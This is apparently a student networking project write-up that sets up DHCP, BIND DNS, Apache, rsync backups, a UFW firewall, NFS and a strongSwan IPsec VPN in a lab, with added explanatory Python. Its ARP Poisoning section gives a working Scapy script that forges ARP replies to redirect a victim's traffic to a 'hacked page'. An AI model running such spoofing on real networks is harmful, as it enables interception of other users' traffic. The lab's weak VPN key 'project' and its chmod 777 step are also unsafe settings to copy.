Data Networking/Fall 2016/PAKP

Group Members
Ashwin Maniyankode Chandranathan, Kailash Natarajan, Pooja Deshpande, Pranoy Thykkoottathil Jose

Objective
The main objective of this project is to build a secure and dynamic network with Dynamic Host Configuration Protocol (DHCP), Domain Name System (DNS), a webserver, a firewall and a backup system, using the Ubuntu Linux operating system.

Dynamic Host Configuration Protocol
Dynamic Host Configuration Protocol (DHCP) is a network protocol that enables a server to automatically assign an IP address to a computer from a defined range of IP addresses (i.e., a scope) configured for a given network. The DHCP server leases an address to any DHCP-enabled client when it starts up on the network. Since IP addresses are dynamic (leased) rather than static (permanently assigned), addresses which are no longer in use are automatically returned to the pool for reallocation. Both IPv4 and IPv6 addresses can be assigned by a DHCP server.

DHCP supports three mechanisms for IP address allocation; one or more of them is used depending on the policies of the network administrator.
 * 1) Automatic allocation: DHCP assigns an IP address to a client when it receives a request from it.
 * 2) Dynamic allocation: DHCP assigns IP addresses to clients for a specified period of time (or until the client explicitly relinquishes the address). When the lease expires, the client has to request an extension of the lease or request another IP.
 * 3) Manual allocation: Using DHCP, we can assign the same IP to a particular device by using its MAC address as an identifier. For example, a server will always have the same IP, even though it obtains it via the DHCP server.

Domain Name System
DNS is an application layer protocol that translates domain names to IP addresses and vice versa. The basic job of DNS is to provide simplicity for the application user, i.e. it translates the user-friendly domain name into a machine-readable IP address which is then used to fetch and forward data. With the explosion in the use of the Internet and the World Wide Web in commercial, security and social markets among many others, it is not possible for a user to remember the numeric IP addresses of sites. This is where DNS steps in: the user only needs to remember a user-friendly domain name like www.google.com, which DNS translates into an IP address such as 8.8.8.8.

Looking further into the behavior of the protocol, a DNS server stores DNS records mapping a domain name to its IP addresses and responds to queries from users with answers from its database.

DNS records are the database entries from which these mappings are fetched. Some of the commonly used DNS record types are A, CNAME, MX, PTR and NS.

Webserver & Firewall
A webserver runs on the Linux OS to host a website; Apache2 is the webserver used. A firewall provides a layer of security to control the incoming and outgoing traffic of a network and to block and filter packets entering the system. The firewall can protect a whole system or a specific server holding databases or confidential data, shielding it from unauthorized clients inside or outside the network.

Dynamic Host Configuration Protocol
1. When a client configured with the TCP/IP setting “Obtain an IP address automatically (DHCP)” plugs into a network, it sends out a broadcast from UDP port 68 to UDP port 67 to “DISCOVER” a DHCP server (or relay agent).
2. The DHCP server then responds by sending out an “Offer” (through a relay agent if applicable).
3. The client then sends out a “Request”, requesting an IP address.
4. This request is finally “Acknowledged” by the server, and the client starts using the IP address.

Domain Name Server
1. The requesting host generates a DNS query packet, which is passed to the Local DNS Server connected to the host network.
2. The Local DNS Server receives this query and forwards it to the appropriate Root Name Server. The Root Name Server checks whether it is a valid domain and whether there are entries for it in its database, and replies to the Local DNS.
3. The Local DNS then sends a query to the TLD DNS Server, which returns the details of the Authoritative Name Server that holds the mapping of the address or name.
4. The Local DNS Server then sends a query to the Authoritative Name Server seeking the mapping for the domain name or IP address that was initially sent by the requesting host.

Webserver
1. The client initiates a TCP connection with the web server's IP address.
2. The connection is established with a 3-way handshake.
3. First, the client sends a SYN message requesting a TCP connection to the web server on port 80.
4. The server responds with a SYN-ACK message acknowledging the request and asking the client to open a port on which the server can send information.
5. The client responds with an ACK message and also sends a request for the HTML page.

DHCP
Step 1: Install DHCP server package

sudo apt-get install isc-dhcp-server

Step 2: Edit the isc-dhcp-server file

sudo vim /etc/default/isc-dhcp-server

On line 11 change: INTERFACES="ens33", then save and exit.

Step 3: Configure the DHCP server for IPv4 by editing the file /etc/dhcp/dhcpd.conf

sudo vim /etc/dhcp/dhcpd.conf

subnet 192.168.10.0 netmask 255.255.255.0 {
    range 192.168.10.30 192.168.10.99;
    option domain-name-servers 192.168.10.10;
    option subnet-mask 255.255.255.0;
    option routers 192.168.10.10;
    option broadcast-address 192.168.10.255;
    default-lease-time 600;
    max-lease-time 7200;
}

The IPv6 address of the interface, in /etc/network/interfaces syntax:

iface eth0 inet6 static
    address 2001:0db8:edfa:1234::1
    netmask 64
    gateway 2001:0db8:edfa:1234::2

For the servers within the network to always have the same IP, we have matched their MAC addresses with a specific IP.

host dns-server {
    hardware ethernet 00:0c:29:8e:69:00;
    fixed-address 192.168.10.10;
}

host web-server {
    hardware ethernet 00:0c:29:5c:7d:2e;
    fixed-address 192.168.10.20;
}

host nfs-server {
    hardware ethernet 00:0c:29:8f:8b:d9;
    fixed-address 192.168.10.15;
}
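As an added illustration of the dynamic and manual allocation mechanisms described earlier, using the values from the dhcpd.conf and host blocks above (this is a constructed simulation, not ISC dhcpd code): a lease pool that hands out the 192.168.10.30-99 range, pins the three servers to their fixed addresses by MAC, caps requested lease times at max-lease-time and returns expired or released leases to the pool.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, Optional

# Constructed simulation of the allocation behaviour, using the values from dhcpd.conf
# and the host blocks; it is an added example, not ISC dhcpd code.
POOL_START = ipaddress.IPv4Address("192.168.10.30")   # range 192.168.10.30 192.168.10.99
POOL_END = ipaddress.IPv4Address("192.168.10.99")
DEFAULT_LEASE_TIME = 600                               # default-lease-time 600
MAX_LEASE_TIME = 7200                                  # max-lease-time 7200
FIXED_HOSTS = {                                        # manual allocation: the three host blocks
    "00:0c:29:8e:69:00": ipaddress.IPv4Address("192.168.10.10"),  # dns-server
    "00:0c:29:5c:7d:2e": ipaddress.IPv4Address("192.168.10.20"),  # web-server
    "00:0c:29:8f:8b:d9": ipaddress.IPv4Address("192.168.10.15"),  # nfs-server
}


@dataclass
class Lease:
    ip: ipaddress.IPv4Address
    mac: str
    expires: int          # value of the simulated clock at which the lease ends


class LeasePool:
    """Simulated DHCP lease pool: dynamic allocation from a range plus MAC-pinned fixed addresses."""

    def __init__(self, start, end, fixed, now=0):
        start, end = ipaddress.IPv4Address(start), ipaddress.IPv4Address(end)
        # every address of the range starts out free; fixed addresses live outside the range
        self.free = [ipaddress.IPv4Address(a) for a in range(int(start), int(end) + 1)]
        self.fixed = dict(fixed)
        self.leases: Dict[str, Lease] = {}   # MAC -> current lease
        self.now = now

    def advance(self, seconds: int) -> None:
        """Move the simulated clock forward and return expired leases to the pool."""
        self.now += seconds
        for mac, lease in list(self.leases.items()):
            if lease.expires <= self.now:
                del self.leases[mac]
                if mac not in self.fixed:        # a fixed address is never handed to anyone else
                    self.free.append(lease.ip)
        self.free.sort()                         # lowest free address is offered first

    def request(self, mac: str, requested: int = DEFAULT_LEASE_TIME) -> Optional[Lease]:
        """Handle a DISCOVER/REQUEST from `mac`; None means the pool is exhausted (no ACK)."""
        lease_time = min(requested, MAX_LEASE_TIME)   # the server caps what a client may ask for
        if mac in self.leases:                        # renewal keeps the same address
            self.leases[mac].expires = self.now + lease_time
            return self.leases[mac]
        if mac in self.fixed:                         # manual allocation, keyed on the MAC
            ip = self.fixed[mac]
        elif self.free:                               # dynamic allocation from the range
            ip = self.free.pop(0)
        else:
            return None
        self.leases[mac] = Lease(ip, mac, self.now + lease_time)
        return self.leases[mac]

    def release(self, mac: str) -> None:
        """DHCPRELEASE: the client hands the address back before the lease expires."""
        lease = self.leases.pop(mac, None)
        if lease is not None and mac not in self.fixed:
            self.free.append(lease.ip)
            self.free.sort()
```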

Step 4: Set the static IP address of the DHCP server

sudo vim /etc/network/interfaces

auto lo
iface lo inet loopback

auto ens33
iface ens33 inet static
    address 192.168.10.18
    netmask 255.255.255.0
    gateway 192.168.10.1
    broadcast 192.168.10.255
    dns-nameservers 192.168.10.10

Step 5: Edit the resolv.conf file

sudo vim /etc/resolv.conf

nameserver 192.168.10.10

Step 6: Restart the DHCP server

sudo /etc/init.d/isc-dhcp-server restart

Step 7: Configuring the DHCPv6 server

Create a file named dhcpd6.conf

sudo vim /etc/dhcp/dhcpd6.conf

#/etc/dhcp/dhcpd6.conf
default-lease-time 86400;
preferred-lifetime 80000;
allow leasequery;
subnet6 2001:0db8:edfa:1234::/64 {
    # Range for clients
    range6 2001:0db8:edfa:1234:5678::aaaa 2001:0db8:edfa:1234:5678::ffff;
}

DNS Server
In this project all the servers are in a private network and receive their IP addresses from the DHCP server. For configuring DNS, we have used Bind9 (Berkeley Internet Name Domain v9) on Ubuntu so that clients can resolve hostnames and IP addresses.

Prerequisite: To configure DNS server one must have root user permissions and install Bind9. To install Bind9, use the following command,

Command:
sudo apt-get update
sudo apt-get install bind9 bind9utils bind9-doc
sudo systemctl daemon-reload
sudo systemctl restart bind9

Step 1: Obtain static IP from DHCP server and assign that in the interface – “/etc/network/interfaces”

Command:
cd /etc/network
sudo nano interfaces

auto eth0
iface eth0 inet static
    address 192.168.10.10
    netmask 255.255.255.0
    network 192.168.10.0
    broadcast 192.168.10.255
    gateway 192.168.10.1

Step 2: Now add the Name Server and Hostname details for the webpage whose address is to be resolved in the – “/etc/hosts” file.

Command:
cd /etc
sudo nano hosts

127.0.0.1       localhost
192.168.10.10   ubuntu.project.com Ubuntu

Step 3: Provide the hostname for the webpage to be resolved in the – “/etc/hostname” file.

Command:
cd /etc
sudo nano hostname

ubuntu.project.com

Step 4: Provide the IP address for the Name Server and name of the webpage in the – “/etc/resolvconf/resolv.conf.d/head” file.

Command:
cd /etc/resolvconf/resolv.conf.d
sudo nano head

nameserver 192.168.10.10
search project.com

Step 5: For the DNS Server we have to specify the forward and the reverse zones that will provide with the forward and reverse DN resolving. This can be done from the – “/etc/bind/named.conf.local” file.

Command:
#Forward Zone
zone "project.com" {
    type master;                            #specifying if the DNS server is master or slave
    file "/etc/bind/db.project.com";        #zone file path
    allow-transfer { 192.168.10.11; };      # secondary DNS IP
    also-notify { 192.168.10.11; };
};

#Reverse Zone
zone "10.168.192.in-addr.arpa" {
    type master;                            #specifying if the DNS server is master or slave
    file "/etc/bind/db.192";                #zone file path
    allow-transfer { 192.168.10.11; };      # secondary DNS IP
    also-notify { 192.168.10.11; };
};

Step 6: Now to add the forwarder IP for the DNS we can configure that in the – “/etc/bind/named.conf.options” file. There is also one more option where you can use Access Lists to only allow specified IP addresses to access the DNS server which can also be added here.

Command:
options {
    forwarders {
        192.168.10.1;                       #forwarder IP for DNS
    };
};

Step 7: Now we have to create the forward and reverse zone which will act as the database from which the DNS server will look-up to resolve for the Domain name or IP address. This database file can be created with reference to the already existing local database file at – “/etc/bind/db.local” file and making our own copy as the – “/etc/bind/db.project.com” file for the forward zone and “/etc/bind/db.192” file for the reverse zone.

Command:
Forward Zone Database:
cd /etc/bind
sudo cp db.local db.project.com
sudo cp db.local db.192
sudo nano /etc/bind/db.project.com

;
; BIND data file for local loopback interface
;
$TTL    604800
@       IN      SOA     ubuntu.project.com. root.project.com. (
                              9         ; Serial
                         604800         ; Refresh
                          86400         ; Retry
                        2419200         ; Expire
                         604800 )       ; Negative Cache TTL
;
@       IN      NS      ubuntu.project.com.
@       IN      A       192.168.10.30
ubuntu  IN      A       192.168.10.30
web     IN      A       192.168.10.20
www     IN      CNAME   web.project.com.
@       IN      AAAA    2001:db8:edfa:1234::15
ubuntu  IN      AAAA    2001:db8:edfa:1234::15
;

Note:
 * The serial number 9 represents the number of times this database file has been edited; make sure you increment it each time the file is edited.
 * The @ symbol means that the record applies in all cases not otherwise specified.
 * That is followed by IN and the record type: A, CNAME, AAAA or NS.

Reverse Zone Database:
sudo nano /etc/bind/db.192

;
; BIND reverse data file for local loopback interface
;
$TTL    604800
@       IN      SOA     ubuntu.project.com. root.project.com. (
                              6         ; Serial
                         604800         ; Refresh
                          86400         ; Retry
                        2419200         ; Expire
                         604800 )       ; Negative Cache TTL
;
@       IN      NS      ubuntu.project.com.
30      IN      PTR     ubuntu.project.com.
20      IN      PTR     web.project.com.
20      IN      PTR     www.web.project.com.
5.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.4.3.2.1.a.f.d.e.8.b.d.0.1.0.0.2.ip6.arpa. IN PTR ubuntu.project.com.
;

Note:
 * The serial number 6 represents the number of times this database file has been edited; make sure you increment it each time the file is edited.
 * The @ symbol means that the record applies in all cases not otherwise specified.
 * That is followed by IN and the record type: PTR or NS.
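An added Python check (not part of the project) that reproduces the reverse-zone naming the two database files above rely on and cross-checks them: reverse_name builds the in-addr.arpa or ip6.arpa owner name for an address, check_reverse_zone verifies that every A and AAAA in db.project.com has a matching PTR, and out_of_zone shows why the AAAA's PTR line in db.192 is dropped when BIND loads the file, since an ip6.arpa name cannot live inside the 10.168.192.in-addr.arpa zone. The record lists are transcribed from the files above, keeping one PTR per reverse name.

```python
import ipaddress
from typing import Dict, List, Tuple

# Records transcribed from the db.project.com and db.192 files above (constructed lists for this
# added example; BIND itself is not involved). One PTR per reverse name is kept.
FORWARD_ZONE = "project.com."
FORWARD_RECORDS: List[Tuple[str, str, str]] = [   # (owner, type, rdata)
    ("ubuntu", "A", "192.168.10.30"),
    ("web", "A", "192.168.10.20"),
    ("www", "CNAME", "web.project.com."),
    ("ubuntu", "AAAA", "2001:db8:edfa:1234::15"),
]
REVERSE_RECORDS: Dict[str, str] = {               # reverse owner name -> PTR target
    "30.10.168.192.in-addr.arpa.": "ubuntu.project.com.",
    "20.10.168.192.in-addr.arpa.": "web.project.com.",
    "5.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.4.3.2.1.a.f.d.e.8.b.d.0.1.0.0.2.ip6.arpa.": "ubuntu.project.com.",
}
REVERSE_ZONE = "10.168.192.in-addr.arpa."         # origin of db.192 as declared in named.conf.local


def reverse_name(address: str) -> str:
    """Owner name under in-addr.arpa (IPv4) or ip6.arpa (IPv6) for a PTR record.

    IPv4 reverses the four octets; IPv6 expands the address to 32 hex nibbles and reverses
    them, one label each (the standard library's ip.reverse_pointer does the same without
    the trailing dot).
    """
    ip = ipaddress.ip_address(address)
    if ip.version == 4:
        return ".".join(reversed(str(ip).split("."))) + ".in-addr.arpa."
    nibbles = ip.exploded.replace(":", "")
    return ".".join(reversed(nibbles)) + ".ip6.arpa."


def check_reverse_zone(forward, reverse) -> List[str]:
    """Cross-check every A/AAAA against the PTR records; return a description of each mismatch."""
    problems = []
    for owner, rtype, rdata in forward:
        if rtype not in ("A", "AAAA"):
            continue                                   # a CNAME has no PTR of its own
        fqdn = f"{owner}.{FORWARD_ZONE}"
        ptr_owner = reverse_name(rdata)
        target = reverse.get(ptr_owner)
        if target is None:
            problems.append(f"{fqdn} {rtype} {rdata}: no PTR at {ptr_owner}")
        elif target != fqdn:
            problems.append(f"{ptr_owner} PTR {target} does not match {fqdn}")
    return problems


def out_of_zone(reverse, zone: str = REVERSE_ZONE) -> List[str]:
    """Names not below the zone origin; BIND ignores such records when loading the zone file."""
    return [name for name in reverse if name != zone and not name.endswith("." + zone)]
```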

Step 8: Now that we have defined the database and the name servers for the DNS server, we have to restart the server for the configurations to take effect.

Command:
sudo systemctl restart bind9
sudo init 6

Configuring Secondary DNS
The primary DNS provides the domain name resolving functionality for the clients. If the primary DNS fails, the clients will not be able to resolve domain names and will be cut off from using the web. To overcome this, it is advisable to have a secondary DNS server that acts as a backup in case the primary DNS fails. It is relatively easy to configure the secondary DNS once the primary DNS is configured.

Prerequisite:  To configure DNS server one must have root user permissions and install Bind9. To install Bind9, use the following command,

Command:
sudo apt-get update
sudo apt-get install bind9 bind9utils bind9-doc
sudo systemctl daemon-reload
sudo systemctl restart bind9

Step 1: Obtain static IP from DHCP server and assign that in the interface – “/etc/network/interfaces”

Command:
cd /etc/network
sudo nano interfaces

auto eth0
iface eth0 inet static
    address 192.168.10.11
    netmask 255.255.255.0
    network 192.168.10.0
    broadcast 192.168.10.255
    gateway 192.168.10.1

Step 2: Now add the Name Server and Hostname details with respect to the webpage for which address resolving has to be done in the – “/etc/hosts” file.

Command:
cd /etc
sudo nano hosts

127.0.0.1       localhost
192.168.10.11   ubuntu.project.com ubuntu

Step 3: Provide the hostname for the webpage to be resolved in the – “/etc/hostname” file.

Command:
cd /etc
sudo nano hostname

ubuntu.project.com

Step 4: Provide the IP address for the Secondary Name Server and name of the webpage in the – “/etc/resolvconf/resolv.conf.d/head” file.

Command:
cd /etc/resolvconf/resolv.conf.d
sudo nano head

nameserver 192.168.10.11
search project.com

Step 5: For the Secondary DNS Server we have to specify the forward and the reverse zones that will provide with the forward and reverse DN resolving. This can be done from the – “/etc/bind/named.conf.local” file

Command:
#Forward Zone
zone "project.com" {
    type slave;                             #specifying if the DNS server is master or slave
    file "/etc/bind/db.project.com";        #zone file path
    masters { 192.168.10.10; };             # primary DNS IP
};

#Reverse Zone
zone "10.168.192.in-addr.arpa" {
    type slave;                             #specifying if the DNS server is master or slave
    file "/etc/bind/db.192";                #zone file path
    masters { 192.168.10.10; };             # primary DNS IP
};

Step 6: Now to add the forwarder IP for the secondary DNS, we can configure that in the – “/etc/bind/named.conf.options” file. There is also one more option where you can use Access Lists to only allow specified IP addresses to access the secondary DNS server which can also be added here.

Command:
options {
    forwarders {
        192.168.10.1;                       #forwarder IP for DNS
    };
};

Step 7: Now that we have defined the database and the name servers for the secondary DNS server, we have to restart the server for the configurations to take effect.

Command:
sudo systemctl restart bind9
sudo init 6

Webserver
Step 1: Install the Apache2 webserver
Command: sudo apt-get install apache2
Step 2: Check whether the web server is listening on port 80
Command: netstat -a | more
Step 3: Restart the web server
Command: sudo /etc/init.d/apache2 restart
Step 4: Develop a webpage for the server
Command:
cd /var/www/html
sudo nano index.html

Webserver Backup
The protocols used for backup are rsync and SSH. Rsync is a tool used to synchronize files in Ubuntu; it transfers only the data that is not yet synchronized with the backup copy. The SSH protocol provides a secure channel to send and receive files between Unix machines, encrypting the traffic between the two ends. Crontab is used for scheduling backups.
Step 1: Install rsync
sudo apt-get install rsync
Step 2: Install the SSH server
sudo apt-get install openssh-server
Step 3: Create a public and private key pair for security
ssh-keygen -t rsa
Step 4: Append the new public key to the backup host's authorized keys
cat .ssh/id_rsa.pub | ssh ashwinmc1@192.168.10.15 'cat >> .ssh/authorized_keys'
Step 5: Edit the crontab
crontab -e
Step 6: Schedule the rsync command from the crontab to automate the backup of the webserver (here at minute 25 of every hour)
25 * * * * rsync -avzP --delete -e ssh /var/www/html ashwinmc1@192.168.10.15:/home/ashwinmc1/Backup

Firewall
Step 1: Install the UFW package
sudo apt-get install ufw
Step 2: Check UFW status
sudo ufw status
Step 3: Set up default policies
sudo ufw default deny incoming
sudo ufw default allow outgoing
Step 4: Allow SSH, HTTP, FTP and HTTPS connections from the local subnet
sudo ufw allow from 192.168.10.0/24 to any port 443
sudo ufw allow from 192.168.10.0/24 to any port 80
sudo ufw allow from 192.168.10.0/24 to any port 21
sudo ufw allow from 192.168.10.0/24 to any port 22
Step 5: Disable ping
sudo nano /etc/ufw/before.rules
Comment out this line:
-A ufw-before-input -p icmp --icmp-type echo-request -j ACCEPT
Step 6: Enable UFW
sudo ufw enable

Algorithm
1. A client tries to connect to the network.
2. Once connected, the client tries to obtain an IP via DHCP, so a broadcast message is sent out requesting an IP.
3. The DHCP server provides an IP address to the client if the request is successful. Otherwise, a 'request fail' message is obtained and the network administrator has to be contacted for help.
4. The client now tries to access the web server. If the domain name server details obtained via DHCP are correct, a request is sent to the DNS to resolve the IP address of the domain, and the DNS replies with the IP address of the web page. Else, if the DNS reply fails, an error message 'server not found' is displayed; else, if the URL entered is wrong, an error message 'webpage unavailable' is displayed. Retry.
5. The client has reached the web server and sends an HTTP request to it. If the request is successful, the web page is displayed; else an error message such as 'no data received' is displayed. Retry.

Flow Chart
Flow chart has been provided in the project report.

ARP Poisoning
ARP poisoning has been implemented using Scapy.

# Import scapy
from scapy.all import *

# Setting variables
attIP = "192.168.10.39"
attMAC = "00:0c:29:7b:64:65"
vicIP = "192.168.10.40"
vicMAC = "00:0c:29:60:af:21"
dgwIP = "192.168.10.20"
dgwMAC = "00:0c:29:5c:7d:2e"

# Forge the ARP packet for the victim
arpFakeVic = ARP()
arpFakeVic.op = 2
arpFakeVic.psrc = dgwIP
arpFakeVic.pdst = vicIP
arpFakeVic.hwdst = vicMAC

# Forge the ARP packet for the default GW
arpFakeDGW = ARP()
arpFakeDGW.op = 2
arpFakeDGW.psrc = vicIP
arpFakeDGW.pdst = dgwIP
arpFakeDGW.hwdst = dgwMAC

# While loop to send ARP replies while the cache is not spoofed
while True:
    # Send the ARP replies
    send(arpFakeVic)
    send(arpFakeDGW)
    print("ARP sent")

    # Wait for ARP replies from the default GW
    sniff(filter="arp and host 10.0.0.1 or host 10.0.0.209", count=1)
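A defensive counterpart to the script above, added here and not part of the project: it replays a constructed log of ARP replies seen on the project LAN and flags the two signatures the poisoning leaves on the wire, a known IP-to-MAC binding changing and a single MAC answering for several IPs. The trusted baseline (KNOWN_BINDINGS) is assumed to come from the DHCP fixed-address entries; the project itself has no such monitor.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

# Constructed log of ARP replies (op=2, "is-at") as a monitor on the project LAN might capture
# them; the addresses are the ones used in the script above. Each entry is (sender IP, sender MAC).
ARP_REPLIES: List[Tuple[str, str]] = [
    ("192.168.10.20", "00:0c:29:5c:7d:2e"),   # default gateway answers for itself
    ("192.168.10.40", "00:0c:29:60:af:21"),   # victim host answers for itself
    ("192.168.10.20", "00:0c:29:7b:64:65"),   # gateway IP suddenly claimed by another MAC
    ("192.168.10.40", "00:0c:29:7b:64:65"),   # victim IP claimed by that same MAC
    ("192.168.10.20", "00:0c:29:7b:64:65"),   # the forged reply keeps repeating
]
# Trusted baseline, assumed for this example: the gateway's binding as pinned by a DHCP
# fixed-address entry (the project's dhcpd.conf pins 00:0c:29:5c:7d:2e to 192.168.10.20).
KNOWN_BINDINGS: Dict[str, str] = {"192.168.10.20": "00:0c:29:5c:7d:2e"}


class ArpWatch:
    """Keeps an IP-to-MAC table and raises alerts on the two signatures ARP poisoning leaves."""

    def __init__(self, known: Dict[str, str] = None):
        self.table: Dict[str, str] = dict(known or {})            # first/trusted binding per IP
        self.claims: Dict[str, Set[str]] = defaultdict(set)       # MAC -> IPs it has answered for
        self.alerts: List[str] = []

    def observe(self, ip: str, mac: str) -> None:
        prev = self.table.get(ip)
        if prev is None:
            self.table[ip] = mac                  # learn a binding the first time we see it
        elif prev != mac:
            # Signature 1: an address we already know now arrives from a different MAC.
            self.alerts.append(f"binding change: {ip} was {prev}, now {mac}")
        newly_claimed = ip not in self.claims[mac]
        self.claims[mac].add(ip)
        if newly_claimed and len(self.claims[mac]) > 1:
            # Signature 2: one MAC answering for several IPs (here gateway and victim at once).
            self.alerts.append(f"{mac} answers for {sorted(self.claims[mac])}")

    def suspicious_macs(self) -> Set[str]:
        """MACs that have claimed more than one IP address."""
        return {mac for mac, ips in self.claims.items() if len(ips) > 1}


def analyse(replies: Iterable[Tuple[str, str]], known: Dict[str, str] = None) -> ArpWatch:
    """Replay a list of ARP replies through the watcher and return it for inspection."""
    watch = ArpWatch(known)
    for ip, mac in replies:
        watch.observe(ip, mac)
    return watch


if __name__ == "__main__":
    for line in analyse(ARP_REPLIES, KNOWN_BINDINGS).alerts:
        print(line)
```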

NFS
Step 1: Configuring the NFS server
Command:
sudo apt-get install nfs-kernel-server
sudo chmod 777 location
(location is the directory to be exported)
Edit the exports file:
sudo nano /etc/exports
On the last line append:
/home/ashwinmc1/mnt 192.168.10.0/255.255.255.0(rw,sync,root_squash,subtree_check)
Save and exit. Change to the exported directory and create a file in it:
cd /home/ashwinmc1/mnt
touch newfile
sudo nano newfile
Start the server:
sudo service nfs-kernel-server start

Step 2: Configuring the NFS client
Command to install the NFS client:
sudo apt-get install nfs-common
Make a directory at the mount location, then mount the export (server IP 192.168.10.15, server path /home/ashwinmc1/mnt, client path /home/mnt):
sudo mount 192.168.10.15:/home/ashwinmc1/mnt /home/mnt
sudo reboot
sudo mount -a

IPSEC VPN
IPSEC VPN has been implemented using the 'strongswan' package. The IPSEC VPN secures the connection between two servers and ensures that the traffic between them cannot be sniffed in the clear.

VPN First Server Configuration
Step 1: Installing the 'strongswan' package
Command: apt-get install ipsec-tools strongswan-starter

Step 2: Making the crypto map entries
Edit the /etc/ipsec.conf file
Command: vim /etc/ipsec.conf

conn red-to-blue
    authby=secret
    auto=route
    keyexchange=ike
    left=192.168.10.100
    right=192.168.10.200
    type=tunnel
    esp=aes128gcm16!

Step 3: Make the PSK entries

We need to edit the /etc/ipsec.secrets file

Command: vim /etc/ipsec.secrets

192.168.10.100 192.168.10.200 : PSK "project"

Step 4: Restart the ipsec service
Command: ipsec restart

VPN Second Server Configuration
Step 1: Installing the 'strongswan' package
Command: apt-get install ipsec-tools strongswan-starter

Step 2: Making the crypto map entries
Edit the /etc/ipsec.conf file
Command: vim /etc/ipsec.conf

conn blue-to-red
    authby=secret
    auto=route
    keyexchange=ike
    left=192.168.10.200
    right=192.168.10.100
    type=tunnel
    esp=aes128gcm16!

Step 3: Make the PSK entries

We need to edit the /etc/ipsec.secrets file

Command: vim /etc/ipsec.secrets

192.168.10.100 192.168.10.200 : PSK "project"

Step 4: Restart the ipsec service
Command: ipsec restart

DHCP Test
If the clients are able to get IP addresses from the range defined in the server pool, then DHCP is working properly. For example, since the DHCPv4 address pool is assigned from 192.168.10.30 to 192.168.10.99 and the DHCPv6 pool is assigned from 2001:0db8:edfa:1234:5678::aaaa to 2001:0db8:edfa:1234:5678::ffff, if a client gets assigned the IP addresses 192.168.10.36 and 2001:0db8:edfa:1234:5678::aaa1 through DHCP, then the DHCP server is assigning IP addresses correctly and is functioning properly.

We can also see the status of the DHCP servers by using the commands:

systemctl status isc-dhcp-server

systemctl status isc-dhcp-server6

DNS Test
For testing the functioning and effectiveness of DNS, the following commands are useful:
1) dig: The Domain Information Groper is used to query DNS name servers. It performs DNS lookups and returns the response from the name servers. E.g., we can request a zone transfer from the secondary DNS with the following command,
dig @192.168.10.10 project.com AXFR
which returns the records from the master server.
2) ping: Ping is used for checking the network layer status of the server. It can be run on both the master and the slave DNS to check whether each is reachable from the other.
3) nslookup: nslookup is a command used to query DNS servers. Interactive mode lets the user query the name servers for information about hosts and domains. Non-interactive mode lets the user print just the name and the requested information for a particular host or domain.
4) host: host is used for DNS lookups. It resolves hostnames to IP addresses and vice versa.

Webserver Test
Open the web browser and enter the host name or the local IP address. If it is working, then the web server is up and running.

Firewall Test
A client can try to ping the servers that are blocked. If the response is 'request timed-out' then, the firewall has blocked the client and it is working as per the firewall rules.

VPN Test
To test IPSEC VPN, run a continuous ping from one server to the other. Simultaneously, run the command:

watch ipsec statusall

or

tcpdump esp

If the number of packets increases in the first case, or you see ESP packets in the second case, then the IPSEC tunnel is configured properly.

ARP Poisoning Test
When the client tries to access the webpage, if he/she is redirected to the hacked page, then ARP poisoning has been properly implemented.

Future Scope
1. Implementing AAA servers for added security.
2. Additional firewall rules for added security.
3. Adding mail servers.
4. Expanding server capabilities.
5. Increasing the number of DNS servers for load distribution and decentralization.